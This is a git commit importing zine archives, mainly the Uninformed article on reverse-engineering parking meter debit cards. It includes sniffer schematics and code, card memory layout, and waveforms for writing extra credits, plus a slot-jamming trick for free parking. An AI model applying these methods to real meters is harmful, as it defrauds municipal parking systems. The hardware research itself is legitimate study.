mirror of
https://github.com/fdiskyou/Zines.git
synced 2025-03-09 00:00:00 +01:00
1st import into tree
This commit is contained in:
parent
1d06a57fbb
commit
6b097ec81b
73 changed files with 41019 additions and 0 deletions
1214
uninformed/1.1.txt
Normal file
1214
uninformed/1.1.txt
Normal file
File diff suppressed because it is too large
Load diff
1219
uninformed/1.2.txt
Normal file
1219
uninformed/1.2.txt
Normal file
File diff suppressed because it is too large
Load diff
752
uninformed/1.3.txt
Normal file
752
uninformed/1.3.txt
Normal file
|
@ -0,0 +1,752 @@
|
|||
|
||||
==Uninformed Research==
|
||||
|
||||
|=-----------------------=[ Smart Parking Meters ]=---------------------=|
|
||||
|=----------------------------------------------------------------------=|
|
||||
|=------------------=[ h1kari <h1kari@dachb0den.com> ]=-----------------=|
|
||||
|
||||
--=[ Contents ]=----------------------------------------------------------
|
||||
|
||||
1 - Introduction
|
||||
2 - ISO7816
|
||||
3 - Synchronous Cards
|
||||
3.1 - Memory Cards
|
||||
3.2 - Parking Meter Debit Cards
|
||||
3.3 - The Simple Hack
|
||||
4 - Memory Dump
|
||||
5 - Synchronous Smart Card Protocol Sniffing
|
||||
5.1 - Sniffer Design
|
||||
5.2 - Sniffer Code
|
||||
6 - Protocol Analysis
|
||||
6.1 - Decoding Data
|
||||
6.2 - Timing Graph
|
||||
6.3 - Conclusions
|
||||
7 - Conclusion
|
||||
|
||||
|
||||
--[ 1 - Introduction ]----------------------------------------------------
|
||||
|
||||
If this whitepaper looks a little familiar to you, I'm going to admit
|
||||
off the bat that it's based a bit on Phrack 48-10/11 (Electronic Telephone
|
||||
Cards: How to make your own!) and is using a similar format to Phrack
|
||||
62-15 (Introduction for Playing Cards for Smart Profits). I highly
|
||||
recommend you read both of them if you're trying to learn about smart
|
||||
cards.
|
||||
|
||||
I'm sure that many of you that live near a major city have seen
|
||||
parking meters that require you to pay money in order to park in a spot.
|
||||
Upon initial analysis of these devices you'll notice there is a slot for
|
||||
money to go in. On some, there is also a slot for a Parking Meter Debit
|
||||
Card that you can purchase from the city. This article will analyze these
|
||||
Parking Meters and their Debit Cards, show how they tick, and show how you
|
||||
can defeat their security.
|
||||
|
||||
The end goal however is to provide enough information so you can
|
||||
create your own tools to learn more about smart cards and how they work.
|
||||
I have no intention of having people use this article to rip off the
|
||||
government, this is for educational purposes only. My only hope is that by
|
||||
getting this information out there, security systems will be designed more
|
||||
thoroughly in the future.
|
||||
|
||||
PARKING METER
|
||||
|
||||
_,-----,_
|
||||
,-' `-,
|
||||
/ ._________. \
|
||||
/ , | 00:00 <+-,-+------ Time/Credits Display
|
||||
Meter Status ----+>'-''---------''-'<+----- Meter Status
|
||||
| ,-------, |
|
||||
| |\ |<+-------+----- Coin Slot
|
||||
Smart Card Slot -----\--+->\ | | /
|
||||
\ '----\--' /
|
||||
\ /
|
||||
\ /
|
||||
\ /
|
||||
\-----------/
|
||||
| ,-------, |
|
||||
Money --------+-+-->o | |
|
||||
| | | |
|
||||
| | | |
|
||||
| '-------' |
|
||||
\---------/
|
||||
| |
|
||||
|
||||
|
||||
For those not familiar with these devices, you can go to various
|
||||
locations around town and purchase these Parking Meter Debit Cards that
|
||||
are preloaded with $10, $20, or $50. To explain how to use these, I will
|
||||
quote off of the instructions provided on the back of the cards:
|
||||
|
||||
.--------------------------------------------------------------------.
|
||||
/ \
|
||||
| PARKING METER DEBIT CARD |
|
||||
| |
|
||||
| 1. Insert debit card into meter in direction shown by arrow. |
|
||||
| The dollar balance of the card will flash 4 times. |
|
||||
| 2. The Meter will increment in 6 min. segments. |
|
||||
| 3. When desired time is displayed, remove card. |
|
||||
| |
|
||||
| DID YOU BUY TOO MUCH TIME? |
|
||||
| TO OBTAIN EXTRA TIME REFUND |
|
||||
| |
|
||||
| * Insert the same debit card that was used to purchase time |
|
||||
| on the meter. Full 6 minute increments will be credited to |
|
||||
| card. Increments of less than 6 minutes will be lost. |
|
||||
| |
|
||||
| Parking cards may be used for ************** meters |
|
||||
| which have yellow posts. |
|
||||
| |
|
||||
\--------------------------------------------------------------------/
|
||||
|
||||
NOTE: The increments are now 4 min due to raising prices
|
||||
|
||||
I'm not including a lot of information that's provided in those
|
||||
Phrack's that were mentioned, so if things look a little incomplete,
|
||||
please read through them before emailing me with questions.
|
||||
|
||||
Here's a list of all of my resources:
|
||||
|
||||
- The ISO7816 Standard
|
||||
|
||||
- Phrack 48-10/11 & 62-15
|
||||
|
||||
- Towitoko ChipDrive 130
|
||||
|
||||
- Homebrew Synchronous Protocol Sniffer (Schematics Included)
|
||||
|
||||
- A few Parking Meter Debit Cards
|
||||
|
||||
- A few Parking Meters
|
||||
|
||||
- Computer with a Parallel Port
|
||||
|
||||
- A business card or two
|
||||
|
||||
|
||||
--[ 2 - ISO7816 ]---------------------------------------------------------
|
||||
|
||||
The ISO 7816 standard is one of the few resources we have to work with
|
||||
when reverse engineering a smart card. It provides us with basic knowledge
|
||||
of pin layouts, what the different pins do, and how to interface with
|
||||
them. Unfortunately, it mostly covers asynchronous cards and doesn't
|
||||
really touch on how synchronous cards work. To get more detailed
|
||||
information on this please read Phrack 48-10/11.
|
||||
|
||||
|
||||
--[ 3 - Synchronous Cards ]-----------------------------------------------
|
||||
|
||||
Synchronous protocols are usually used with memory cards mainly to
|
||||
reduce cost (since the card doesn't require an internal clock) and because
|
||||
usually memory cards don't require much logic and are used for simple
|
||||
applications. Asynchronous cards on the other hand have an internal clock
|
||||
and can communicate with the reader at a fixed rate across the I/O line
|
||||
(usually 9600 baud), asynchronous cards are usually used with processor
|
||||
cards where more interaction is required (see Phrack 62-15).
|
||||
|
||||
|
||||
----[ 3.1 - Memory Cards ]------------------------------------------------
|
||||
|
||||
Memory cards use a very simple protocol for sending data. First off,
|
||||
because synchronous cards don't know anything about timing, their clock is
|
||||
provided by the reader. In this situation, the reader can set the I/O line
|
||||
when the clock is low (0v) and the card can set the I/O line when the
|
||||
clock is high (5v). To dump all of the memory from a card, the reader
|
||||
first sets the Reset line high to reset the card and keeps the clock
|
||||
ticking. The first time the Reset line is low and the Clock is raised the
|
||||
card will set the I/O line to whatever the 0 bit is in memory, the second
|
||||
time it's raised, the card will set the I/O line to whatever the 1 bit is
|
||||
in memory, etc. This is repeated until all of the data is dumped from the
|
||||
card.
|
||||
|
||||
__________________
|
||||
_| |___________________________________________ Reset
|
||||
: :
|
||||
: _____ : _____ _____ _____ _____
|
||||
_:_______| |____:_| |_____| |_____| |_____| Clk
|
||||
: : : : : : : : : :
|
||||
_:_______:__________:_:_____:_____:_____:_____:_____:_____:_____
|
||||
_:___n___|_____0____:_|_____1_____|_____2_____|_____3_____|___4_ (Address)
|
||||
: : : : :
|
||||
_: :_______:___________:___________:___________
|
||||
_XXXXXXXXXXXXXXXXXXXX_______|___________|___________|___________ Data
|
||||
Bit n Bit 0 Bit 1 Bit2 Bit3
|
||||
|
||||
(Borrowed from Stephane Bausson's paper re-published in Phrack 48-10)
|
||||
|
||||
|
||||
----[ 3.1 - Parking Meter Debit Cards ]-----------------------------------
|
||||
|
||||
Parking Meter Debit Cards behave very similarly to standard memory
|
||||
cards, however they also have to provide some basic security to make sure
|
||||
people can't get free parking. This is done by using a method similar to
|
||||
the European Telephone Cards (SLE4406) where there is a section of memory
|
||||
on the card that acts as a one-way counter where bits are set to a certain
|
||||
amount of credits, then a security fuse is blown, and now the set bits can
|
||||
only be flipped from 1 -> 0. This is a standard security mechanism that
|
||||
makes it so people cannot recharge their cards once the credits have been
|
||||
used. The only catch is that the way that the parking meters work makes it
|
||||
so you can refund unused credits to the card.
|
||||
|
||||
|
||||
----[ 3.2 - Parking Meter Debit Cards ]-----------------------------------
|
||||
|
||||
If my little introduction to Synchronous Smart Cards just went right
|
||||
over your head, here's an example of how to attack Parking Meters without
|
||||
having to deal with electronics or code. If you ever try putting an
|
||||
invalid card into a parking meter, you'll notice that after about 90
|
||||
seconds of flashing error messages, it will switch over to Out-of-Order
|
||||
status. Now, for convenience sake, most cities allow you to park for free
|
||||
in Out-of-Order spots. (Anyone see a loophole here???)
|
||||
|
||||
.----------------------------------------------------------------------.
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : <- insert folded side |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
'----------------------------------------------------------------------'
|
||||
|
||||
One simple method you can use for making it less obvious that
|
||||
something in the slot is making it be Out-of-Order is to fold a business
|
||||
card in half (preferably not yours) and insert it into the smart card
|
||||
slot. It should be the perfect length that it will go in and be very
|
||||
difficult to notice and/or take out. When you're finished parking, you
|
||||
should be able to pull the business card out using a credit card or small
|
||||
flathead screwdriver.
|
||||
|
||||
|
||||
--[ 4 - Memory Dump ]-----------------------------------------------------
|
||||
|
||||
To explain how the cards handle credits and refunds, I'll first show
|
||||
you how the memory on the card is laid out. This dump was done using my
|
||||
Towitoko ChipDrive 130 using Towitoko's SmartCard Editor Software (very
|
||||
useful). I highly suggest that you use a commercial smart card reader or
|
||||
some sort of non-dumb reader for dealing with synchronous cards, dumb
|
||||
mouse (and most home-brew) readers only work with asynchronous cards.
|
||||
|
||||
0x00: 9814 ff3c 9200 46b1 ffff ffff ffff ffff
|
||||
0x10: ffff ffff ffff ff00 0000 0000 0000 0000
|
||||
0x20: 0000 0000 0000 0000 0000 0000 0000 0000
|
||||
0x30: 0000 0000 0000 0000 0000 0000 0000 0000
|
||||
0x40: 0000 0000 0000 0000 0000 0000 0000 0000
|
||||
0x50: 0000 0000 f8ff ffff ffff ffff fffc ffff
|
||||
0x60: ffff ffff ffff ffff ffff ffff ffff ffff
|
||||
0x70: ffff ffff ffff ffff ffff ffff ffff ffff
|
||||
0x80: ffff ffff ffff ffff ffff ffff ffff ffff
|
||||
0x90: ffff ffff ffff ffff ffff ffff ffff ffff
|
||||
0xa0: fcff ffff ffff ffff ffff ffff ffff ffff
|
||||
0xb0: ffff ffff ffff ffff ffff ffff ffff ffff
|
||||
0xc0: ffff ffff
|
||||
|
||||
Now.. if we convert over the 0x50 line to bits and analyze it, we'll
|
||||
notice this (note that bit-endianness is reversed):
|
||||
|
||||
0x50: 0000 0000 0000 0000 0000 0000 0000 0000
|
||||
0x54: 0001 1111 1111 1111 1111 1111 1111 1111
|
||||
0x58: 1111 1111 1111 1111 1111 1111 1111 1111
|
||||
0x5a: 1111 1111 0011 1111 1111 1111 1111 1111
|
||||
|
||||
For every bit that is 1 between 0x17 and 0x55:1 (note: :x notation
|
||||
specifies bit offset), you get $0.10 on your card. For every bit that is 0
|
||||
between 0x5b and 0xb0 you get $0.10 in refunds. The total of these two
|
||||
counters equals the amount of credits on your card. Now, how they handle
|
||||
people using the refunds is by having the buffer of bits inbetween 0x55:1
|
||||
and 0x5b that can be used if there are refund bits that can be spent. This
|
||||
only allows the user to use ~ $5 worth of refund bits. On this particular
|
||||
card, the user has $0.60 worth of credits and $0.20 worth of refunds
|
||||
making a total of $0.80 on the card (I know, I'm poor :-/).
|
||||
|
||||
|
||||
--[ 5 - Synchronous Smart Card Protocol Sniffing ]------------------------
|
||||
|
||||
Now that we've figured out how they store credits on the card, we need
|
||||
to figure out how the reader writes to the card. To do this, we'll need
|
||||
to somehow sniff the connection and reverse engineer their protocol. The
|
||||
following section will show you how to make your own synchronous smart
|
||||
card protocol sniffer and give you code for sniffing the connection.
|
||||
|
||||
|
||||
----[ 5.1 - Sniffer Design ]----------------------------------------------
|
||||
|
||||
There's plenty of commercial hardware out there (Season) that allow
|
||||
you to sniff asynchronous smart cards, but it's a totally different story
|
||||
for synchronous cards. I wasn't able to find any hardware to do this (and
|
||||
being totally dumb when it comes to electronics) found someone to help me
|
||||
out with this design (thx XElf). It basically taps the lines between a
|
||||
smart card and the reader and runs the signals through an externally
|
||||
powered buffer to make sure our parallel port doesn't drain the
|
||||
connection.
|
||||
|
||||
My personal implementation consists of a smart card socket I ripped
|
||||
out of an old smart card reader, a peet's coffee card that I made ISO7816
|
||||
pinouts on using copper tape, all connected by torn apart floppy drive
|
||||
cables, and powered by a ripped apart usb cable. You should be able to
|
||||
find some pics on the net if you search around, although I guarantee
|
||||
whatever you come up with will be less ghetto than me.
|
||||
|
||||
|
||||
Parallel Port
|
||||
|
||||
D10 - Ack - I6 o-------------------------,
|
||||
|
|
||||
D11 - Busy - I7 o-----------------------------,
|
||||
| |
|
||||
D12 - Paper Out - I5 o---------------------------------,
|
||||
| | |
|
||||
D13 - Select - I4 o-------------------------------------,
|
||||
| | | |
|
||||
D25 - Gnd o-----, | | | |
|
||||
| | | | |
|
||||
| | | | |
|
||||
External 5V (USB) | | | | |
|
||||
| | | | |
|
||||
5V o------------------, | | | | |
|
||||
| | | | | |
|
||||
0V o-------*----*-----|---*-------------------|---|---|---|-----,
|
||||
| | | | | | | | |
|
||||
| | ,--==--==--==--==--==--==--==--==--==--==--, |
|
||||
__+__ | |_ 20 19 18 17 16 15 14 13 12 11 | |
|
||||
///// | | ] 74HCT541N | |
|
||||
| |' 1 2 3 4 5 6 7 8 9 10 | |
|
||||
| '--==--==--==--==--==--==--==--==--==--==--' |
|
||||
| | | | | | | | | | | |
|
||||
| | '---*---*---* | | | | '-----'
|
||||
'-----*---------, ,---|---* | | |
|
||||
| | ,-|---|---* | |
|
||||
Smart Card | | | | | | *---|------,
|
||||
,----------,----------, | | | | | | | *----, |
|
||||
,-------|--* Vcc | Gnd *--|-* | | | ,-, ,-, ,-, ,-, | |
|
||||
| |----------|----------| | | | | | | | | | | | | | |
|
||||
| ,-----|--* Reset | Vpp | | | | | | | | | | | | | | |
|
||||
| | |----------|----------| | | | | |_| |_| |_| |_| | |
|
||||
| | ,---|--* Clock | I/O *--|---|-* | |r1 |r2 |r3 |r4 | |
|
||||
| | | |----------|----------| | | | | |10k|10k|10k|10k | |
|
||||
| | | ,-|--* RF1 | RF2 *--|---* | | | | | | | |
|
||||
| | | | '----------'----------' | | | '---*---*---*---' | |
|
||||
| | *-|-------------------------|-|-|----------------------' |
|
||||
| *-|-|-------------------------|-|-|------------------------'
|
||||
| | | | | | |
|
||||
| | | | Smart Card Reader | | |
|
||||
| | | | ,----------,----------, | | |
|
||||
'-------|--* Vcc | Gnd *--|-' | |
|
||||
| | | |----------|----------| | |
|
||||
'-----|--* Reset | Vpp | | |
|
||||
| | |----------|----------| | |
|
||||
'---|--* Clock | I/O *--|---' |
|
||||
| |----------|----------| |
|
||||
'-|--* RF1 | RF2 *--|-----'
|
||||
'----------'----------'
|
||||
|
||||
|
||||
----[ 5.2 - Sniffer Code ]------------------------------------------------
|
||||
|
||||
To monitor the connection, compile and run this code with a log
|
||||
filename as an argument. This code is written for openbsd and uses it's
|
||||
i386_iopl() function to get access to writing to the ports. You may need
|
||||
to modify it to work on other OSs. Due to file i/o speed limitations, it
|
||||
will log to the file whenever you hit ctrl+c.
|
||||
|
||||
|
||||
/*
|
||||
* Synchronous Smart Card Logger v1.0 [synclog.c]
|
||||
* by h1kari <h1kari@dachb0den.com>
|
||||
*/
|
||||
#include <stdio.h>
|
||||
#include <signal.h>
|
||||
#include <sys/types.h>
|
||||
#include <machine/sysarch.h>
|
||||
#include <i386/pio.h>
|
||||
|
||||
#define BASE 0x378
|
||||
#define DATA (BASE)
|
||||
#define STATUS (BASE + 1)
|
||||
#define CONTROL (BASE + 2)
|
||||
#define ECR (BASE + 0x402)
|
||||
#define BUF_MAX (1024 * 1024 * 8) /* max log size 8mb */
|
||||
|
||||
int bufi = 0;
|
||||
u_char buf[BUF_MAX];
|
||||
char *logfile;
|
||||
|
||||
void
|
||||
die(int signo)
|
||||
{
|
||||
int i, b;
|
||||
FILE *fh;
|
||||
|
||||
/* open logfile and write output */
|
||||
if((fh = fopen(logfile, "w")) == NULL) {
|
||||
perror("unable to open lpt log file");
|
||||
exit(1);
|
||||
}
|
||||
for(i = 0; i < bufi; i++)
|
||||
printbits(fh, buf[i]);
|
||||
|
||||
/* flush and exit out */
|
||||
fflush(fh);
|
||||
fclose(fh);
|
||||
_exit(0);
|
||||
}
|
||||
|
||||
int
|
||||
printbits(FILE *fh, int b)
|
||||
{
|
||||
fprintf(fh, "%d%d%d%d\n",
|
||||
(b >> 7) & 1, (b >> 6) & 1,
|
||||
(b >> 5) & 1, (b >> 4) & 1);
|
||||
}
|
||||
|
||||
int
|
||||
main(int argc, char *argv[])
|
||||
{
|
||||
unsigned char a, b, c;
|
||||
unsigned int *ptraddr;
|
||||
unsigned int address;
|
||||
|
||||
if(argc < 2) {
|
||||
fprintf(stderr, "usage: %s <file>\n", argv[0]);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
logfile = argv[1];
|
||||
|
||||
/* enable port writing privileges */
|
||||
if(i386_iopl(3)) {
|
||||
printf("You need to be superuser to use this\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
/* clear status flags */
|
||||
outb(STATUS, inb(STATUS) & 0x0f);
|
||||
|
||||
/* set epp mode, just in case */
|
||||
outb(ECR, (inb(ECR) & 0x1f) | 0x80);
|
||||
|
||||
/* log to file when we get ctrl+c */
|
||||
signal(SIGINT, die);
|
||||
|
||||
/* fetch dataz0r */
|
||||
c = 0;
|
||||
while(bufi < BUF_MAX) {
|
||||
/* select low nibble */
|
||||
outb(CONTROL, (inb(CONTROL) & 0xf0) | 0x04);
|
||||
|
||||
/* read low nibble */
|
||||
if((b = inb(STATUS)) == c)
|
||||
continue;
|
||||
|
||||
buf[bufi++] = c = b; /* save last state bits */
|
||||
}
|
||||
|
||||
printf("buffer overflow!\n");
|
||||
die(0);
|
||||
}
|
||||
|
||||
|
||||
It might also help to drop the priority level when running it, if it
|
||||
looks like you're having timing issues:
|
||||
|
||||
# nice -n -20 ./synclog file.log
|
||||
|
||||
|
||||
--[ 6 - Protocol Analysis ]-----------------------------------------------
|
||||
|
||||
Once we get our log of the connection, we'll need to run it through
|
||||
some tools to analyze and decode the protocol. I've put together a couple
|
||||
of simple tools that'll make your life a lot easier. One will simply
|
||||
decode the bytes that are transferred across based on the state changes.
|
||||
The other will graph out the whole conversation 2-dimensionally so you
|
||||
can graphically view patterns in the connection.
|
||||
|
||||
|
||||
----[ 6.1 - Decoding Data ]-----------------------------------------------
|
||||
|
||||
For decoding the data, we simply record bits to an input buffer when
|
||||
the clock is in one state, and to an output buffer when the clock is in
|
||||
the other. Then dump all of the bytes and reset our counter whenever
|
||||
there's a reset. This should give us a dump of the data that's being
|
||||
transferred between the two devices.
|
||||
|
||||
|
||||
/*
|
||||
* Synchronous Smart Card Log Analyzer v1.0 [analyze.c]
|
||||
* by h1kari <h1kari@dachb0den.com>
|
||||
*/
|
||||
#include <stdio.h>
|
||||
|
||||
#ifdef PRINTBITS
|
||||
#define BYTESPERROW 8
|
||||
#else
|
||||
#define BYTESPERROW 16
|
||||
#endif
|
||||
|
||||
void
|
||||
pushbit(u_char *byte, u_char bit, u_char n)
|
||||
{
|
||||
/* add specified bit to their byte */
|
||||
*byte &= ~(1 << (7 - n));
|
||||
*byte |= (bit << (7 - n));
|
||||
}
|
||||
|
||||
void
|
||||
printbuf(u_char *buf, int len, char *io)
|
||||
{
|
||||
int i, b;
|
||||
|
||||
printf("%s:\n", io);
|
||||
|
||||
for(i = 0; i < len; i++) {
|
||||
#ifdef PRINTBITS
|
||||
int j;
|
||||
|
||||
for(j = 7; j >= 0; j--)
|
||||
printf("%d", (buf[i] >> j) & 1);
|
||||
putchar(' ');
|
||||
#else
|
||||
printf("%02x ", buf[i]);
|
||||
#endif
|
||||
if((i % BYTESPERROW) == BYTESPERROW - 1)
|
||||
printf("\n");
|
||||
}
|
||||
|
||||
if((i % BYTESPERROW) != 0) {
|
||||
printf("\n");
|
||||
}
|
||||
}
|
||||
|
||||
int
|
||||
main(int argc, char *argv[])
|
||||
{
|
||||
u_char ibit, obit;
|
||||
u_char ibyte, obyte;
|
||||
u_char clk, rst, bit;
|
||||
u_char lclk;
|
||||
u_char ibuf[1024 * 1024], obuf[1024 * 1024];
|
||||
int ii = 0, oi = 0;
|
||||
char line[1024];
|
||||
FILE *fh;
|
||||
|
||||
if(argc < 2) {
|
||||
fprintf(stderr, "usage: %s <file>\n", argv[0]);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if((fh = fopen(argv[1], "r")) == NULL) {
|
||||
perror("unable to open lpt log\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
lclk = 2;
|
||||
while(fgets(line, 1024, fh) != NULL) {
|
||||
bit = line[0] - 48;
|
||||
rst = line[2] - 48;
|
||||
clk = line[3] - 48;
|
||||
bit = bit ? 0 : 1;
|
||||
|
||||
if(lclk == 2) lclk = clk;
|
||||
|
||||
/* print out buffers when we get a reset */
|
||||
if(rst) {
|
||||
if(ii > 0 && oi > 0) {
|
||||
printbuf(ibuf, ii, "input");
|
||||
printbuf(obuf, oi, "output");
|
||||
}
|
||||
ibit = obit = 0;
|
||||
ibyte = obyte = 0;
|
||||
ii = oi = 0;
|
||||
}
|
||||
|
||||
/* if clock high input */
|
||||
if(clk) {
|
||||
/* incr on clock change */
|
||||
if(lclk != clk) obit++;
|
||||
pushbit(&ibyte, bit, ibit);
|
||||
/* otherwise output */
|
||||
} else {
|
||||
/* incr on clock change */
|
||||
if(lclk != clk) ibit++;
|
||||
pushbit(&obyte, bit, obit);
|
||||
}
|
||||
|
||||
/* next byte */
|
||||
if(ibit == 8) {
|
||||
ibuf[ii++] = ibyte;
|
||||
ibit = 0;
|
||||
}
|
||||
|
||||
if(obit == 8) {
|
||||
obuf[oi++] = obyte;
|
||||
obit = 0;
|
||||
}
|
||||
|
||||
/* save last clock */
|
||||
lclk = clk;
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
----[ 6.2 - Timing Graph ]------------------------------------------------
|
||||
|
||||
Sometimes it really helps to see data graphically instead of just a
|
||||
bunch of hex and 1's and 0's, so my friend pr0le threw together this perl
|
||||
script that creates an image with a time diagram of the lines. By
|
||||
analyzing this it made it easier to see how they were performing reads
|
||||
and writes to the card.
|
||||
|
||||
|
||||
|
||||
#!/usr/bin/perl
|
||||
use GD;
|
||||
|
||||
my $logfile = shift || die "usage: $0 <logfile>\n";
|
||||
|
||||
open( F, "<$logfile" );
|
||||
my @lines = <F>;
|
||||
close( F );
|
||||
|
||||
my $len = 3;
|
||||
|
||||
my $im_len = scalar( @lines );
|
||||
my $w = $im_len * $len;
|
||||
my $h = 100;
|
||||
|
||||
my $im = new GD::Image( $w, $h );
|
||||
my $white = $im->colorAllocate( 255, 255, 255 );
|
||||
my $black = $im->colorAllocate( 0, 0, 0 );
|
||||
|
||||
$im->fill( 0, 0, $white );
|
||||
|
||||
my $i = 1;
|
||||
my $init = 0;
|
||||
my ($bit1,$bit2,$rst,$clk);
|
||||
my ($lbit1,$lbit2,$lrst,$lclk) = (undef,undef,undef,undef);
|
||||
my ($x1, $y1, $x2, $y2);
|
||||
foreach my $line ( @lines ) {
|
||||
($bit1,$bit2,$rst,$clk) = ($line =~ m/^(\d)(\d)(\d)(\d)/);
|
||||
if( $init ) {
|
||||
&print_bit( $lbit1, $bit1, 10 );
|
||||
&print_bit( $lbit2, $bit2, 30 );
|
||||
&print_bit( $lrst, $rst, 50 );
|
||||
&print_bit( $lclk, $clk, 70 );
|
||||
}
|
||||
($lbit1,$lbit2,$lrst,$lclk) = ($bit1,$bit2,$rst,$clk);
|
||||
$init = 1;
|
||||
$i++;
|
||||
}
|
||||
|
||||
open( F, ">$logfile.jpg" );
|
||||
binmode F;
|
||||
print F $im->jpeg;
|
||||
close( F );
|
||||
|
||||
exit;
|
||||
|
||||
sub print_bit {
|
||||
my ($old, $new, $ybase) = @_;
|
||||
|
||||
if( $new != $old ) {
|
||||
if( $new ) {
|
||||
$im->line( $i*$len, $ybase+10, $i*$len, $ybase+20, $black );
|
||||
$im->line( $i*$len, $ybase+20, $i*$len+$len, $ybase+20, $black );
|
||||
} else {
|
||||
$im->line( $i*$len, $ybase+20, $i*$len, $ybase+10, $black );
|
||||
$im->line( $i*$len, $ybase+10, $i*$len+$len, $ybase+10, $black );
|
||||
}
|
||||
} else {
|
||||
if( $new ) {
|
||||
$im->line( $i*$len, $ybase+20, $i*$len+$len, $ybase+20, $black );
|
||||
} else {
|
||||
$im->line( $i*$len, $ybase+10, $i*$len+$len, $ybase+10, $black );
|
||||
}
|
||||
}
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
|
||||
----[ 6.3 - Conclusions ]-------------------------------------------------
|
||||
|
||||
This code showed how the reserved lines on the smart card are used in
|
||||
conjunction with credit increments and decrements. This is an analysis of
|
||||
how it triggers a credit deduct or add on the card:
|
||||
|
||||
|
||||
DEDUCT $0.10:
|
||||
|
||||
___________ ___________
|
||||
_________| |___________| |__________________ Reset
|
||||
____________________________________
|
||||
_____________________| |_____ Clk
|
||||
___________
|
||||
_________| |__________________________________________ I/O
|
||||
___________
|
||||
_________| |__________________________________________ Rsv1
|
||||
|
||||
Then issue write command:
|
||||
00011001 00101000 11111111 00111100
|
||||
01001001 00000000 01100010 10001101
|
||||
11111111 11111111 01110111 10101101
|
||||
|
||||
|
||||
ADD $0.20:
|
||||
|
||||
___________ ___________ _____
|
||||
_________| |___________| |____________| Reset
|
||||
____________________________________
|
||||
_____________________| |_____ Clk
|
||||
_____________________________________________
|
||||
|__________________ I/O
|
||||
___________________________________
|
||||
_________| |__________________ Rsv1
|
||||
|
||||
Then issue write command:
|
||||
00011001 00101000 11111111 00111100
|
||||
01001001 00000000 01100010 10001101
|
||||
11111111 11111111 01110111 10101101
|
||||
_____
|
||||
__________________________________________________________| Reset
|
||||
________ ___________ ____________
|
||||
| |___________| |___________| |_____ Clk
|
||||
____________________ ________________________
|
||||
| |___________| |_____ I/O
|
||||
____________________ ________________________
|
||||
| 1 Credit |___________| 2 Credits |_____ Rsv1
|
||||
|
||||
|
||||
Since the parking meter will refund whatever remaining amount there is
|
||||
to the card and doesn't have to do it one at a time like with decrements,
|
||||
the write command supports writing multiple credits back onto the card.
|
||||
Simply repeat the waveform above and assert Reset when you're finished
|
||||
"refunding" however many credits you want.
|
||||
|
||||
|
||||
--[ 7 - Conclusion ]------------------------------------------------------
|
||||
|
||||
By now, you're probably thinking that this article sucks because there
|
||||
isn't any ./code that will just give you more $. Unfortunately, most
|
||||
security smart card protocols are fairly proprietary and whatever code I
|
||||
released probably wouldn't work in your particular city. And all of the
|
||||
data and waveforms I've included in this article probably gives the city
|
||||
it does correspond to, enough info to start camping white vans on my
|
||||
front lawn. ;-o
|
||||
|
||||
Instead of lame vendor specific code, we're aiming to give you
|
||||
something much more powerful in the next part to this article which will
|
||||
allow you to emulate arbitrary smart cards and simple electronic
|
||||
protocols (thx spidey). So stay tuned for the next uninformed article
|
||||
from Dachb0den Labs.
|
||||
|
||||
-h1kari 0ut
|
380
uninformed/1.4.txt
Normal file
380
uninformed/1.4.txt
Normal file
|
@ -0,0 +1,380 @@
|
|||
Loop Detection
|
||||
Peter Silberman
|
||||
peter.silberman@gmail.com
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: During the course of this paper the reader will gain new knowledge
|
||||
about previous and new research on the subject of loop detection. The topic of
|
||||
loop detection will be applied to the field of binary analysis and a case study
|
||||
will given to illustrate its uses. All of the implementations provided in this
|
||||
document have been written in C/C++ using Interactive Disassembler (IDA)
|
||||
plug-ins.
|
||||
|
||||
Thanks: The author would like to thank Pedram Amini, thief, Halvar Flake,
|
||||
skape, trew, Johnny Cache and everyone else at nologin who help with ideas, and
|
||||
kept those creative juices flowing.
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
The goal of this paper is to educate the reader both about why loop detection
|
||||
is important and how it can be used. When a security researcher thinks of
|
||||
insecure coding practices, things like calls to strcpy and sprintf are some of
|
||||
the first things to come to mind. These function calls are considered low
|
||||
hanging fruit. Some security researchers think of integer overflows or
|
||||
off-by-one copy errors as types of vulnerabilities. However, not many people
|
||||
consider, or think to consider, the mis-usage of loops as a security problem.
|
||||
With that said, loops have been around since the beginning of time (e.g. first
|
||||
coding languages). The need for a language to iterate over data to analyze
|
||||
each object or character has always been there. Still, not everyone thinks to
|
||||
look at a loop for security problems. What if a loop doesn't terminate
|
||||
correctly? Depending on the operation the loop is performing, it's possible
|
||||
that it could corrupt surrounding memory regions if not properly managed. If
|
||||
the loop frees memory that no longer exists or is not memory, a double-free bug
|
||||
could've been found. These are all things that could, and do, happen in a
|
||||
loop.
|
||||
|
||||
As the low hanging fruit is eliminated in software by security researchers and
|
||||
companies doing decent to moderate QA testing, the security researchers have to
|
||||
look elsewhere to find vulnerabilities in software. One area that has only
|
||||
been touched on briefly in the public relm, is how loops operate when
|
||||
translated to binaries BugScan is an example of a company that has implemented
|
||||
"buffer iteration" detection but hasn't talked publically about it.
|
||||
http://www.logiclibrary.com. The reader may ask: why would one want to look at
|
||||
loops? Well, a lot of companies implement their own custom string routines,
|
||||
like strcpy and strcat, which tend to be just as dangerous as the standard
|
||||
string routines. These functions tend to go un-analyzed because there is no
|
||||
quick way to say that they are copying a buffer. Due to this reason, loop
|
||||
detection can help the security research identify areas of interest. During
|
||||
the course of this article the reader will learn of the different ways to
|
||||
detect loops using graph analysis, how to implement loop detection, see a new
|
||||
loop detection IDA plug-in, and a case study that will tie it all together.
|
||||
|
||||
|
||||
3) Algorithms Used to Detect Loops
|
||||
|
||||
A lot of research has been done on the subject of loop detection. The
|
||||
research, however, was not done for the purpose of finding and exploiting
|
||||
vulnerabilities that exist inside of loops. Most research has been done with
|
||||
an interest in recognizing and optimizing loops A good article about loop
|
||||
optimization and compiler optimization is
|
||||
